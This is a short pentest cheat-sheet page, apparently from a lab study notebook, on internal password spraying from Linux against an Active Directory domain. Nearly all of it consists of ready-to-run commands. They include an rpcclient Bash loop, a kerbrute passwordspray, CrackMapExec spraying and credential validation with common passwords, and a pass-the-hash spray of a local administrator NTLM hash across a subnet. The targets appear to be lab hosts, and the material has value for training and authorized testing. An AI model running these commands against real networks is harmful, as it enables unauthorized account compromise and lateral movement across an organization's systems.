LinkedinTryHackme

Internal Password Spraying - from Linux

  • Usando uma linha Bash para o ataque

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

  • Usando Kerbrute para o Ataque

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

  • Usando CrackMapExec e filtrando falhas de logon

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

  • Validando as credenciais com CrackMapExec

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

  • Administração local pulverizando com CrackMapExec

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
PreviousPassword Spraying - Making a Target User ListNextInternal Password Spraying - from Windows

Last updated